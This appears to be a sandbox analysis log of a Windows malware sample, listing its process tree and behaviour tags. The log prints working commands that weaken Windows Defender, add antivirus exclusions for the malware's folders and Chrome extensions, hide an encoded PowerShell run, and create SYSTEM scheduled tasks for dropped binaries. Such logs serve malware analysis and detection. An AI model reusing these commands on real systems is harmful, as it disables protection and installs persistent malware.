C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32 3⤵ PID:5084
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64 3⤵ PID:1816
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32 3⤵ PID:3616
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64 3⤵ PID:4428
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32 3⤵ PID:2360
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64 3⤵ PID:4604
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32 3⤵ PID:3800
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64 3⤵ PID:3824
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32 3⤵ PID:1432
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64 3⤵ PID:524
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32 3⤵ PID:2688
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64 3⤵ PID:4104
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32 3⤵ PID:4260
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64 3⤵ PID:2372
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32 3⤵ PID:3244
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64 3⤵ PID:2856
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32 3⤵ PID:1388
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64 3⤵ PID:4228
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32 3⤵ PID:3132
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64 3⤵ PID:164
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32 3⤵ PID:1240
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64 3⤵ PID:2868
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32 3⤵ PID:1460
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64 3⤵ PID:768
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WIQLPldOU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WIQLPldOU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fjxFshYjVWUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fjxFshYjVWUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ixMyiQryENPMC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ixMyiQryENPMC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qMeQRvtmXyxU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qMeQRvtmXyxU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\JHBMAPUCCwSCzfVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\JHBMAPUCCwSCzfVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\hwSlakOgexbeQMmf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\hwSlakOgexbeQMmf\" /t REG_DWORD /d 0 /reg:64;" 2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3860
C:\Windows\SysWOW64\cmd.exe  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WIQLPldOU" /t REG_DWORD /d 0 /reg:32 3⤵ PID:2164
C:\Windows\SysWOW64\reg.exe  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WIQLPldOU" /t REG_DWORD /d 0 /reg:32 4⤵ PID:1872
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WIQLPldOU" /t REG_DWORD /d 0 /reg:64 3⤵ PID:1340
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fjxFshYjVWUn" /t REG_DWORD /d 0 /reg:32 3⤵ PID:4612
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fjxFshYjVWUn" /t REG_DWORD /d 0 /reg:64 3⤵ PID:4300
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ixMyiQryENPMC" /t REG_DWORD /d 0 /reg:32 3⤵ PID:3444
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ixMyiQryENPMC" /t REG_DWORD /d 0 /reg:64 3⤵ PID:4420
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qMeQRvtmXyxU2" /t REG_DWORD /d 0 /reg:32 3⤵ PID:3772
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qMeQRvtmXyxU2" /t REG_DWORD /d 0 /reg:64 3⤵ PID:32
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR" /t REG_DWORD /d 0 /reg:32 3⤵ PID:3848
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR" /t REG_DWORD /d 0 /reg:64 3⤵ PID:3764
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\JHBMAPUCCwSCzfVB /t REG_DWORD /d 0 /reg:32 3⤵ PID:3856
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\JHBMAPUCCwSCzfVB /t REG_DWORD /d 0 /reg:64 3⤵ PID:880
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32 3⤵ PID:760
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64 3⤵ PID:4568
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo /t REG_DWORD /d 0 /reg:32 3⤵ PID:3432
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo /t REG_DWORD /d 0 /reg:64 3⤵ PID:4016
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\hwSlakOgexbeQMmf /t REG_DWORD /d 0 /reg:32 3⤵ PID:4368
C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\hwSlakOgexbeQMmf /t REG_DWORD /d 0 /reg:64 3⤵ PID:5080
C:\Windows\SysWOW64\schtasks.exe  schtasks /CREATE /TN "gqUIbQjsM" /SC once /ST 05:24:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" 2⤵
- Scheduled Task/Job: Scheduled Task
PID:4616
C:\Windows\SysWOW64\schtasks.exe  schtasks /run /I /tn "gqUIbQjsM" 2⤵ PID:2928
C:\Windows\SysWOW64\schtasks.exe  schtasks /DELETE /F /TN "gqUIbQjsM" 2⤵ PID:1432
C:\Windows\SysWOW64\schtasks.exe  schtasks /CREATE /TN "AxfyqSaZTcFttLJtv" /SC once /ST 09:22:33 /RU "SYSTEM" /TR "\"C:\Windows\Temp\hwSlakOgexbeQMmf\haxZTeUOcKzKbBE\mdAXtPS.exe\" T3 /VEUWdideL 385132 /S" /V1 /F 2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:168
C:\Windows\SysWOW64\schtasks.exe  schtasks /run /I /tn "AxfyqSaZTcFttLJtv" 2⤵ PID:3244
C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 712 -s 600 2⤵
- Program crash
PID:2296
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== 1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616
C:\Windows\system32\gpupdate.exe  "C:\Windows\system32\gpupdate.exe" /force 2⤵ PID:3148
\??\c:\windows\system32\svchost.exe  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc 1⤵ PID:2124
C:\Windows\system32\svchost.exe  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum 1⤵ PID:5084
\??\c:\windows\system32\gpscript.exe  gpscript.exe /RefreshSystemParam 1⤵ PID:2824
C:\Windows\Temp\hwSlakOgexbeQMmf\haxZTeUOcKzKbBE\mdAXtPS.exe  C:\Windows\Temp\hwSlakOgexbeQMmf\haxZTeUOcKzKbBE\mdAXtPS.exe T3 /VEUWdideL 385132 /S 1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5032
C:\Windows\SysWOW64\schtasks.exe  schtasks /DELETE /F /TN "blQxnfAaNNFZMWpemd" 2⤵ PID:768
C:\Windows\SysWOW64\cmd.exe  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & 2⤵ PID:4060
C:\Windows\SysWOW64\forfiles.exe  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" 3⤵ PID:4644
C:\Windows\SysWOW64\cmd.exe  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True 4⤵ PID:2312
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True 5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2152
C:\Windows\SysWOW64\Wbem\WMIC.exe  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True 6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3032
C:\Windows\SysWOW64\schtasks.exe  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\WIQLPldOU\HKgHFn.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "zuAKRFeuERsPXGg" /V1 /F 2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4224
C:\Windows\SysWOW64\schtasks.exe  schtasks /CREATE /TN "zuAKRFeuERsPXGg2" /F /xml "C:\Program Files (x86)\WIQLPldOU\dRuFPYX.xml" /RU "SYSTEM" 2⤵
- Scheduled Task/Job: Scheduled Task
PID:4592
C:\Windows\SysWOW64\schtasks.exe  schtasks /END /TN "zuAKRFeuERsPXGg" 2⤵ PID:2844
C:\Windows\SysWOW64\schtasks.exe  schtasks /DELETE /F /TN "zuAKRFeuERsPXGg" 2⤵ PID:4524
C:\Windows\SysWOW64\schtasks.exe  schtasks /CREATE /TN "lJTDNNrzcsGlGa" /F /xml "C:\Program Files (x86)\qMeQRvtmXyxU2\jJQVFBu.xml" /RU "SYSTEM" 2⤵
- Scheduled Task/Job: Scheduled Task
PID:2580
C:\Windows\SysWOW64\schtasks.exe  schtasks /CREATE /TN "VRuKNmtcmCQGr2" /F /xml "C:\ProgramData\JHBMAPUCCwSCzfVB\jQoOWCz.xml" /RU "SYSTEM" 2⤵
- Scheduled Task/Job: Scheduled Task
PID:32
C:\Windows\SysWOW64\schtasks.exe  schtasks /CREATE /TN "UZNAYPGMDJwYFtgCO2" /F /xml "C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR\GylyHog.xml" /RU "SYSTEM" 2⤵
- Scheduled Task/Job: Scheduled Task
PID:3252
C:\Windows\SysWOW64\schtasks.exe  schtasks /CREATE /TN "dnucZiIKRABpvEFHHbL2" /F /xml "C:\Program Files (x86)\ixMyiQryENPMC\CuTPMYm.xml" /RU "SYSTEM" 2⤵
- Scheduled Task/Job: Scheduled Task
PID:4580
C:\Windows\SysWOW64\schtasks.exe  schtasks /CREATE /TN "cTixPRTTdvXlYhynT" /SC once /ST 04:28:16 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\hwSlakOgexbeQMmf\pxtLGgMG\iazIYGF.dll\",#1 /FNVdidcsEW 385132" /V1 /F 2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2408
C:\Windows\SysWOW64\schtasks.exe  schtasks /run /I /tn "cTixPRTTdvXlYhynT" 2⤵ PID:516
C:\Windows\SysWOW64\schtasks.exe  schtasks /DELETE /F /TN "AxfyqSaZTcFttLJtv" 2⤵ PID:2356
C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 2132 2⤵
- Program crash
PID:204
\??\c:\windows\system32\rundll32.EXE  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\hwSlakOgexbeQMmf\pxtLGgMG\iazIYGF.dll",#1 /FNVdidcsEW 385132 1⤵ PID:3844
C:\Windows\SysWOW64\rundll32.exe  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\hwSlakOgexbeQMmf\pxtLGgMG\iazIYGF.dll",#1 /FNVdidcsEW 385132 2⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4856
C:\Windows\SysWOW64\schtasks.exe  schtasks /DELETE /F /TN "cTixPRTTdvXlYhynT" 3⤵ PID:2304
Network
MITRE ATT&CK Enterprise v15
Downloads